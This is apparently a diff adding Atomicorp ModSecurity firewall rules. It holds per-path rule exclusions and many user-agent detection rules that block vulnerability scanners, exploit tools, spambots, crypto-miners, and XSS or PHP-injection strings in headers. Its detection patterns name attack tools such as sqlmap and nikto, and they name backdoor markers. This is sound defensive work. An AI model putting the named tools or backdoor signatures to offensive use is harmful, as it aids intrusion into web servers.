+SecRule REQUEST_FILENAME "/cgi/upload\.cgi" "phase:2,id:95080,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330069"
+
+SecRule REQUEST_FILENAME "/tfu/tfu_upload\.php" "phase:2,id:95081,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330069"
+
+SecRule REQUEST_FILENAME "/qm/dm\.master" "phase:2,id:95082,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330072"
+
+SecRule REQUEST_FILENAME "/dump_full_recs\.txt" "phase:2,id:95083,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330072"
+
+SecRule REQUEST_FILENAME "/export/kelkoo\.php" "phase:2,id:95084,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330128"
+
+SecRule REQUEST_FILENAME "/admincp" "phase:2,id:95085,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330069"
+
+SecRule REQUEST_FILENAME "/ideal_wbp1ah\.php" "phase:2,id:95086,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330036"
+
+SecRule REQUEST_FILENAME "/checkout/onepage" "phase:2,id:95087,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330036"
+
+SecRule REQUEST_FILENAME "/postsale\.php" "phase:2,id:95088,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330036"
+
+SecRule REQUEST_FILENAME "/cancel\.php" "phase:2,id:95089,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330036"
+
+SecRule REQUEST_FILENAME "/cp-res-cancel\.php" "phase:2,id:95090,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330036"
+
+SecRule REQUEST_FILENAME "/cron\.php" "phase:2,id:95091,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330017"
+
+SecRule REQUEST_FILENAME "/linkmachine/linkmachine\.php" "phase:2,id:95092,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330072"
+
+SecRule REQUEST_FILENAME "/api/postback" "phase:2,id:95093,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330036"
+
+SecRule REQUEST_FILENAME "/spinclude\.cgi" "phase:2,id:95094,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330039"
+
+SecRule REQUEST_FILENAME "/vmpayment/realex/notify\.php" "phase:2,id:95095,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330039"
+
+SecRule REQUEST_FILENAME "/alipay_callback\.php" "phase:2,id:95096,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330131"
+
+SecRule REQUEST_FILENAME "/cgi-bin/quickshow\.cgi" "phase:2,id:95097,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=332039,ctl:ruleRemovebyID=336657"
+
+SecRule REQUEST_FILENAME "/payment/barclays/barclays_response\.php" "phase:2,id:95098,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330036"
+
+SecRule REQUEST_FILENAME "/modules/ogone/validation\.php" "phase:2,id:95099,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330036"
+
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# User Agent Security Rules for modsec 2.x
+#
+# Copyright 2005-2023 by Atomicorp, Inc., all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# Distribution of this work or derivative of this work in any form is
+# prohibited unless prior written permission is obtained from the
+# copyright holder.
+#
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+# ---ASL-CONFIG-FILE---
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+
+
+
+SecRule ARGS "acunetix_wvs_security_test" "phase:2,rev:'3',t:none,t:lowercase,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules: Acunetix Security Scanner Scanned the Site',id:333331,severity:'2'"
+
+#check headers for known malicious clients and agents
+SecRule REQUEST_HEADERS|REQUEST_HEADERS_NAMES|REQUEST_COOKIES  "@pm aaaaaa x-scan-memo acunetix ethereumstratum xmrig xmr-stak-cpu minername cpuminer" "id:334927,rev:1,phase:2,t:none,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:333729,pass,nolog,noauditlog,skipAfter:END_UA_H_CHECKS"
+
+SecRule REQUEST_HEADERS "x-aaaaaa" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,id:330001,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Spam: Generic spam header detected'"
+
+SecRule REQUEST_HEADERS_NAMES|REQUEST_COOKIES "acunetix" "phase:2,rev:'3',t:none,t:lowercase,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules: Acunetix Security Scanner Scanned the Site',id:333301,severity:'2'"
+
+SecRule REQUEST_HEADERS_NAMES|REQUEST_COOKIES "(?:ethereumstratum|xmrig/|xmr-stak-cpu|minername/|cpuminer/)" "phase:2,rev:'4',t:none,t:lowercase,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules: Cryptoware blocked',id:333330,severity:'2'"
+
+SecRule REQUEST_HEADERS_NAMES|REQUEST_COOKIES "X-Scan-Memo" "phase:2,rev:'3',t:none,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules: Security Scanner Scanned the Site',id:333341,severity:'2'"
+
+SecMarker END_UA_H_CHECKS
+
+SecRule REQUEST_HEADERS:User-Agent "^Internet Explorer " "phase:2,t:none,deny,log,auditlog,status:403,id:330305,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Fake Microsoft Internet Explorer Browser'"
+
+SecRule REQUEST_HEADERS:User-Agent "baidu; baiduspider" "phase:2,t:none,deny,log,auditlog,status:403,id:330363,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Known malicious agent and fake baiduspider'"
+
+SecRule REQUEST_HEADERS:User-Agent "^Windows NT 6.1; Win64; x64$" "phase:2,t:none,deny,log,auditlog,status:403,id:333332,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Known malicious agent'"
+
+# Rule 330006: recursion attack in UA field
+#SecRule REQUEST_HEADERS:User-Agent "\.\./\.\." 	"id:330006,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: recursion attack in UA field'"
+
+#May cause false positives with some software, comment out if it does
+#SecRule REMOTE_ADDR "!^127\.0\.0\.1$" "chain,id:390000,rev:1,severity:1,msg:'Atomicorp.com WAF Rules: Suspicious Automated or Manual Request'"
+#SecRule "REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Host|REQUEST_HEADERS:Accept" "^$"
+#
+SecRule &REQUEST_HEADERS:x-up-devcap-post-charset "@ge 1" "phase:2,t:none,deny,log,auditlog,status:403,id:333333,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WAF bypass detected using x-up-devcap-post-charset in combination with prefix \'UP\' to User-Agent',chain"
+SecRule REQUEST_HEADERS:User-Agent "@rx ^(?i)up"  "t:none"
+
+
+#Parallel skip
+SecRule REQUEST_HEADERS:User-Agent|REQUEST_URI  "@pm Xs_Kontrol NextGenSearchBot Synapse App3leWebKit MJ12bot sosospider fdm ICS python libcurl js-kit bot 5.0 8484 admin@google.com agdm79@mail mua amiga-aweb/3.4 analyzer atomic_email_hunter backdoor bilbo black blackwidow brutus butch__2 bwh3_user_agent cgichk cherrypickernicerspro china combine concealed contentsmartz copyguard copyrightcheck cisco-torch sql springenwerk toata scan whcc sundayddr nmap prog.customcrawler network-services-auditor grendel-scan get-minimal pymills-spider dav.pm crescent datacha0s dbrowse demo digimarc download dts ebrowse ecollector emailcollector emailwolf exploit godzilla dirbuster dotdotpwn extractor extractorpro fantombrowser foobar franklin full gameboy grabber grub hole indy injection internet-exprorer isc jaascois k1b larbin@unspecified libwen-us pycurl blacksun cyberdog absinthe autogetcolumn metis missigua morfeus morzilla mosiac mozilla/3 mozilla/2.01 mozilla/4.0 mozilla/4.76 mozilla/5. murzillo nameofagent .nasl nessus arachni havij acunetix whatweb newt nikto ninja nokia-waptoolkit nsauditor n-stealth paros pavuk picscout pe pmafind poe-component-client production prowebwaler psycheclone rainbow safexplorer security shareware siphon sitesnagger sohu spider s.t.a.l.k.e.r stress surf teleport telesoft test voideye vxb webbandit webcopier webemailextract webinspect weblogs webmole webroot webster webstripper webtrends webvulnscan webzip wells wep widow windows-update-agent < php http_get_vars super happy fun psycheclone grub crawl hurt core-project/ winnie poh siphon nutscrape/ missigua emailsiphon digger nutchcvs trackback/ autoemailspider pussycat user-agent: omniexplorer ecollector cherrypicker zemu revolt casper kmccrew planetwork dex sledink perl kangen sasqia t34mh4k mama jcomers indonetwork goblox ayumi_im0etz whitehat zmeu w3af.sourceforge.net yandex chinaclaw googlehttpclient playstation script about applet activex chrome object www.80legs.com netscape winhttp.winhttprequest.5 obot shell_exec if r00t intelium b55 cybeye riddler loadimpact 2600 patchone pogs chishijen12 typhoeus table href iframe script php xmlset blackseo appscan xSlurp .exe Pcore-HTTP Datanyze struts-pwn raphaelrocks nuclei) wp_is_mobile tsunami openvas fuzz" "id:333924,rev:3,phase:2,t:none,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:333719,pass,nolog,noauditlog,skipAfter:END_UA_CHECKS_1"
+
+SecRule REQUEST_HEADERS:User-Agent "wp_is_mobile" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,id:337741,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: AccessPress Themes backdoor blocked'"
+
+#nmaplowercheck
+SecRule REQUEST_URI "nmaplowercheck" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,id:337764,rev:2,severity:3,msg:'Atomicorp.com WAF Rules: NMAP scanner blocked'"
+
+#Pcore-HTTP
+SecRule REQUEST_HEADERS:User-Agent "Datanyze" "phase:2,deny,log,auditlog,status:403,t:none,id:337749,rev:2,severity:3,msg:'Atomicorp.com WAF Rules: Datanyze bot blocked'"
+
+#Pcore-HTTP
+SecRule REQUEST_HEADERS:User-Agent "Pcore-HTTP" "phase:2,deny,log,auditlog,status:403,t:none,id:334749,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Pcore-HTTP'"
+
+#Xs_Kontrol
+SecRule REQUEST_HEADERS:User-Agent "Xs_Kontrol" "phase:2,deny,log,auditlog,status:403,t:none,id:347749,rev:2,severity:3,msg:'Atomicorp.com WAF Rules: Xs_Kontrol bot blocked'"
+
+#Yahoo!xSlurp
+SecRule REQUEST_HEADERS:User-Agent "Yahoo\!xSlurp" "phase:2,deny,log,auditlog,status:403,t:none,id:334729,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Fake SUPEE-5344 malware agent blocked'"
+#Yahoo!xSlurp
+SecRule REQUEST_HEADERS:User-Agent "NextGenSearchBot" "phase:2,deny,log,auditlog,status:403,t:none,id:334739,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Fake zoominfo search bot blocked'"
+
+#Blackseo Agent v 0.1
+SecRule REQUEST_HEADERS:User-Agent "blackseo agent" "phase:2,deny,log,auditlog,status:403,t:none,t:compressWhitespace,t:lowercase,id:334719,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Blackseo Agent blocked'"
+
+#droptable
+SecRule REQUEST_HEADERS:User-Agent "(?:drop ?table| href|iframe|< ?(?:script|php)|xmlset)" "phase:2,deny,log,auditlog,status:403,t:none,t:compressWhitespace,t:lowercase,id:334709,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Malicious user-agent header attack',chain"
+SecRule REQUEST_HEADERS:User-Agent "!(Iframely)" "t:none" 
+
+#Mozilla/4.0 (compatible; Synapse)
+SecRule REQUEST_HEADERS:User-Agent "Mozilla/4\.0 \(compatible; Synapse\)" "phase:2,deny,log,auditlog,status:403,t:none,id:334009,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Potentially Malicious Open Proxy Connection Attempt'"
+
+#chishijen12
+SecRule REQUEST_HEADERS:User-Agent "chishijen12" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,id:334309,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: CryptoPHP Malicious UserAgent Blocked'"
+
+#Netscape 6.0; WinNT6.1
+SecRule REQUEST_HEADERS:User-Agent "^Netscape " "phase:2,deny,log,auditlog,status:403,t:none,id:334003,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Fake Netscape Browser'"
+
+#Known worm sign
+SecRule REQUEST_HEADERS:User-Agent "WinHttp\.WinHttpRequest\.5" "phase:2,deny,log,auditlog,status:403,t:none,id:334703,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: WinHttp.WinHttpRequest.5 known worm sign detected'"
+
+# Rule 330003: XSS in the UA field
+SecRule REQUEST_HEADERS:User-Agent "<(?:.|\s|\n)?(?:script|about|applet|activex|chrome|object)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,id:330003,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: XSS in User Agent field'"
+
+
+# Rule 330004: PHP code injection attack
+SecRule REQUEST_HEADERS:User-Agent "(?:< ?\? ?php|^ ?< ?\?)"  "phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhitespace,t:lowercase,deny,log,auditlog,status:403,id:330004,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: PHP code injection via User Agent'"
+
+# Rule 330005: PHP code injection attack
+SecRule REQUEST_HEADERS:User-Agent "http_get_vars" "phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhitespace,t:lowercase,deny,log,auditlog,status:403,id:330005,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: PHP code injection via User Agent 2'"
+
+#Joomla bot
+#BOT/0.1 (BOT for JCE)
+SecRule REQUEST_HEADERS:User-Agent "Sosospider" "phase:2,t:none,deny,log,auditlog,status:403,id:330215,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Sosospider - Known abusive bot'"
+
+#Joomla bot
+#BOT/0.1 (BOT for JCE)
+SecRule REQUEST_HEADERS:User-Agent "bot for jce" "phase:2,t:none,t:compressWhitespace,t:lowercase,deny,log,auditlog,status:403,id:330205,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Joomla Exploit Bot'"
+
+#Mozilla/4.0 (compatible; ICS)"
+SecRule REQUEST_HEADERS:User-Agent "Mozilla/4\.0 \(compatible; ICS\)" "phase:2,t:none,deny,log,auditlog,status:403,id:360205,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: ICS Bot'"
+
+#Free Download Manager
+SecRule REQUEST_HEADERS:User-Agent "FDM" "phase:2,t:none,deny,log,auditlog,status:403,id:360215,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Free Download Manager'"
+
+#Joomla bot
+#Mua
+SecRule REQUEST_HEADERS:User-Agent "^mua$" "phase:2,t:none,t:compressWhitespace,t:lowercase,deny,log,auditlog,status:403,id:330206,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Joomla Exploit Bot'"
+
+# Rule 330010: DataCha0s
+SecRule REQUEST_HEADERS:User-Agent "datacha0s/2\.0" "phase:2,t:none,t:lowercase,deny,log,auditlog,status:403,id:330010,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Bad User Agent: DataCha0s'"
+
+# Rule 330011: Damn fine UA
+SecRule REQUEST_HEADERS:User-Agent "(?:exploit|morzilla|cyberdog|blacksun|absinthe|autogetcolumn|bsqlbf|cisco-torch|crimscanner|dav\.pm|pymills-spider|get-minimal|grendel-scan|mysqloit|prog\.customcrawler|sql power injector|sqlmap|sundayddr|friendly-scanner|toata dragostea|b\:2600|loadimpact|patchone|pogs/2\.0|shellshock-scan|appscan|(?:xpymep|start)\.exe|struts-pwn|raphaelrocks|tsunami)" "phase:2,t:none,t:lowercase,deny,log,auditlog,status:403,id:330011,rev:8,severity:2,msg:'Atomicorp.com WAF Rules: Bad User Agent: Known Exploit Tool Detected'"
+
+# Rule 330014: XML RPC exploit tool
+SecRule REQUEST_HEADERS:User-Agent "(?:dirbuster|dotdotpwn)" "phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330015,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Bad User Agent: Exploit tool'"
+
+#Playstation
+#SecRule REQUEST_HEADERS:User-Agent "psp \(playstation portable\)"         "phase:2,t:none,t:lowercase,t:compressWhitespace,deny,status:403,id:393716,phase:2,t:lowercase,msg:'Atomicorp.com WAF Rules: Bad User Agent: Playstation Portable',deny,status:403"
+
+# Rule 330016: A friendly little exploit banner for a WP vuln
+SecRule REQUEST_HEADERS:User-Agent "wordpress hash grabber" "phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330016,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Bad User Agent: Wordpress hash grabber'"
+
+# Rule 330017:  Blocks scripts
+#SecRule REQUEST_URI "!(/webprobilling/pipe/pop\.php|/cron/index\.php|/read\.php|/pg/cron/)" 	"chain,id:330017,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Suspicious User Agent: lwp - Disable this rule if you are using LWP'"
+#SecRule REQUEST_HEADERS:User-Agent lwp
+
+# Rule 330019: Web leaches
+SecRule REQUEST_HEADERS:User-Agent "^(?:web(?:(?:st(?:ripp)?| download|copi)er|zip)|(?:prowebwalk|sitesnagg)er|c(?:heesebot|ombine)|teleport pro|black hole|chinaclaw)" "phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330019,rev:3,severity:3,msg:'Atomicorp.com WAF Rules: Suspicious Web Client Detected (Disable this rule if you wish to allow these clients)'"
+
+# Rule 330031: Bogus Mozilla UA lines
+SecRule REQUEST_HEADERS:User-Agent "m(?:icrosoft internet explorer/5.0|ozilla/3.mozilla/(?:2.01|5\.0)|ozilla/4\.0 \(compatible; msie 7\.0; na; \))$" "phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,capture,id:330031,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Fake Browser User agent detected',logdata:'%{TX.0}'"
+
+
+# Rule 330033: Bogus UA
+SecRule REQUEST_HEADERS:User-Agent "(?:f(?:oobar/|axobot)|^www\.weblogs\.com)"  "phase:2,t:none,t:lowercase,deny,log,auditlog,status:403,id:330033,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Malicious bot attack blocked'"
+
+# Rule 330034: Vuln scanner UA
+SecRule REQUEST_HEADERS:User-Agent "(?:n(?:-stealth|sauditor|e(?:ssus|etwork-services-auditor)|ikto|map)|b(?:lack ?widow|rutus|ilbo)|web(?:inspec|roo)t|p(?:mafind|aros|avuk)|cgichk|jaascois|\.nasl|metis|w(?:ebtrends security analyzer|hcc|3af\.sourceforge\.net)|\bzmeu\b|springenwerk|arachni|acunetix-product|\bhavij\b|^b55 |\briddler\b|netsparker|projectdiscovery/nuclei| openvas|fuzz faster)" "capture,phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330034,rev:14,severity:2,msg:'Atomicorp.com WAF Rules: Unauthorized Vulnerability Scanner detected',logdata:'%{TX.0}'"
+
+# Rule 330035: Vuln scanner UA
+SecRule &REQUEST_HEADERS:X-Scanner "@eq 1" "capture,phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330035,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Unauthorized Vulnerability Scanner detected',logdata:'%{TX.0}'"
+
+# Rule 330037: WhatWeb/
+SecRule REQUEST_HEADERS:User-Agent "whatweb/" "phase:2,t:none,t:lowercase,deny,log,auditlog,status:403,id:330037,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WhatWeb web scanner detected'"
+
+# Rule 330036: BAd/Bogus UAs
+SecRule REQUEST_HEADERS:User-Agent "indy library" "phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330036,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Suspicious User agent detected.  Disable this rule if you use indy library.'"
+# Rule 330038: BAd/Bogus UAs
+SecRule REQUEST_HEADERS:User-Agent "safexplorer tl" "phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330038,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Suspicious Unusual User Agent (SAFEXPLORER)'"
+
+# Rule 330039: Libwww-perl
+SecRule REMOTE_ADDR "!@ipMatch 127.0.0.1,::1" "phase:2,t:none,deny,log,auditlog,status:403,chain,id:330039,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Suspicious Unusual User Agent (libwww-perl).  Disable this rule if you use libwww-perl. '"
+SecRule REQUEST_HEADERS:User-Agent "libwww-perl" "chain,t:none,t:lowercase"
+SecRule REQUEST_HEADERS:User-Agent "!(^w3c-|systran\))" "t:none,t:lowercase"
+
+# Rule 330039: python-requests/
+SecRule REMOTE_ADDR "!@ipMatch 127.0.0.1,::1" "phase:2,t:none,deny,log,auditlog,status:403,chain,id:332039,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Suspicious Unusual User Agent (python-requests).  Disable this rule if you use python-requests/. '"
+SecRule REQUEST_HEADERS:User-Agent "python-requests/" "t:none,t:lowercase"
+
+SecRule REQUEST_FILENAME "admin/controllers/cron\.php$"  "phase:2,id:343759,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_332139"
+
+# Rule 332139: libcurl
+SecRule REMOTE_ADDR "!@ipMatch 127.0.0.1,::1" "phase:2,t:none,deny,log,auditlog,status:403,chain,id:332139,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Suspicious Unusual User Agent (libcurl).  Disable this rule if you use libcurl. '"
+SecRule REQUEST_HEADERS:User-Agent "libcurl" "t:none,t:lowercase"
+SecMarker END_332139
+
+#typhoeus
+SecRule REMOTE_ADDR "!@ipMatch 127.0.0.1,::1" "phase:2,t:none,deny,log,auditlog,status:403,chain,id:332150,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Suspicious User Agent (typhoeus).  Disable this rule if you use typhoeus. '"
+SecRule REQUEST_HEADERS:User-Agent "typhoeus" "t:none,t:lowercase"
+
+# Rule 331039: Python-urllib
+SecRule REMOTE_ADDR "!@ipMatch 127.0.0.1,::1" "phase:2,t:none,deny,log,auditlog,status:403,chain,id:331039,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Suspicious Unusual User Agent (Python-urllib).  Disable this rule if you use Python-urllib. '"
+SecRule REQUEST_HEADERS:User-Agent "python-urllib" "chain,t:none,t:lowercase"
+SecRule REQUEST_HEADERS:User-Agent "!(^w3c-|systran\))" "t:none,t:lowercase"
+
+# Rule 330040: TwengaBot
+SecRule REQUEST_HEADERS:User-Agent "twengabot" "phase:2,t:none,t:lowercase,deny,log,auditlog,status:403,id:330040,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Impolite bot - TwengaBot detected.  Disable this rule if you want to allow TwengaBot. '"
+
+# Rule 330040: TwengaBot
+SecRule REQUEST_HEADERS:User-Agent "(?:JS-Kit URL Resolver|JSKitBotURLResolver|js-kit\.com)" "phase:2,t:none,deny,log,auditlog,status:403,id:330140,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Impolite bot - JS-Kit URL Resolver detected.  Disable this rule if you want to allow JS-Kit URL Resolver. '"
+# Rule 330041:VB development library used by many spammers, might block legite VBscripts
+#comment out if you have problems
+SecRule REQUEST_HEADERS:User-Agent "crescent internet toolpak" "phase:2,t:none,t:lowercase,deny,log,auditlog,status:403,id:330041,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Suspicious User agent detected'"
+
+# Rule 330039: Libpycurl
+SecRule REMOTE_ADDR "!@ipMatch 127.0.0.1,::1" "phase:2,t:none,deny,log,auditlog,status:403,chain,id:330045,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Suspicious Unusual User Agent (pycurl).  Disable this rule if you use pycurl. '"
+SecRule REQUEST_HEADERS:User-Agent "pycurl"  "t:none,t:lowercase"
+
+# Rule 330044: e-mail collectors and spammers
+SecRule REQUEST_HEADERS:User-Agent "(?:e(?:mail(?:s(?:iphon|pider)|collector|wolf)|xtractor(?:pro)?|collector)|web(?:(?:emailextrac|bandi)t|mole)|autoemailspider|cherrypicker|under the rainbow 2|nicerspro|telesoft|grub|j12bot\/v1\.0\.8|(?:blogsearchbot-marti|super happy fu)n|c(?:ore-project\/|herrypicker)|p(?:sycheclone|ussycat)|(?:grub crawl|omniexplor)er|auto ?email ?spider|winnie poh|nut(?:scrape/|chcvs)|app3lewebkit)" "phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,chain,id:330056,rev:10,severity:2,msg:'Atomicorp.com WAF Rules: Email Harvester Spambot User agent detected'"
+SecRule REQUEST_HEADERS:User-Agent "!(windows-live-social-object-extractor-engine|nutch-)" "t:none,t:lowercase"
+
+#Spiders that eat up bandwidth for their customers
+# Rule 330057: Not a spammer, just a spider, comment out if you like
+SecRule REQUEST_HEADERS:User-Agent "(?:copy(?:rightcheck|guard)|digimarc webreader|picscout)" "phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330057,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: DRM Spider User agent detected'"
+
+# Rule 330060: MArketing spiders
+SecRule REQUEST_HEADERS:User-Agent  "zeus .*webster pro" "phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330060,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Marketing Spider User agent detected'"
+
+
+# Rule 330061: Poker spam
+SecRule REQUEST_HEADERS:User-Agent  "(?:(?:w(?:ise(?:nut)?|ebalt)bo|(?:nameof|dts )agen|8484 boston projec)t|(?:f(?:ranklin locato|antombrowse)|atspide)r|china local browse 2|murzillo compatible|libwen-us|program shareware 1|we(?:lls search ii|p search 00)|digger|trackback\/)" "phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330061,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Spambot User agent detected'"
+
+#330269 suspicious UA
+SecRule REQUEST_HEADERS:User-Agent  "poe-component-client" "phase:2,t:none,t:lowercase,deny,log,auditlog,status:403,id:330269,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Suspicious User Agent (POE-Component-Client)'"
+
+# Rule 330070: spam bots
+SecRule REQUEST_HEADERS:User-Agent  "missigua" "phase:2,t:none,t:lowercase,deny,log,auditlog,status:403,id:330070,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Suspicious unusual User Agent'"
+
+#spammer
+SecRule REQUEST_HEADERS:User-Agent "(?:agdm79@mail\.ru|larbin@unspecified|butch__2\.1\.1|internet exploiter|hl_ftien_spider|godzilla)" "phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330079,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Comment Spammer User Agent'"
+
+#Fake Gameboy UA
+SecRule REQUEST_HEADERS:User-Agent "gameboy\, powered by nintendo" "phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330080,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Comment Spammer User Agent (Fake Gamboy UA)'"
+
+#bogus amiga UA
+SecRule REQUEST_HEADERS:User-Agent "amiga-aweb/3\.4" "phase:2,t:none,t:lowercase,deny,log,auditlog,status:403,id:330081,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Fake Amiga Web Agent'"
+
+#bogus googlebot UA
+SecRule REQUEST_HEADERS:User-Agent "(?:nokia-waptoolkit.* googlebot.*googlebot|googlehttpclient)" "phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330083,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Fake GoogleBot'"
+
+#exploit UA
+SecRule REQUEST_HEADERS:User-Agent "(?:mo(?:rfeus fucking scanner|siac 1)|internet(?:-exprorer| ninja)|s\.t\.a\.l\.k\.e\.r\.|kenjin spider|neuralbot/| obot|shell_exec|if \(|r00t|intelium|cybeye|\bcaptch|^apitool$)" "phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330082,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Known Exploit User Agent'"
+
+#fake UA
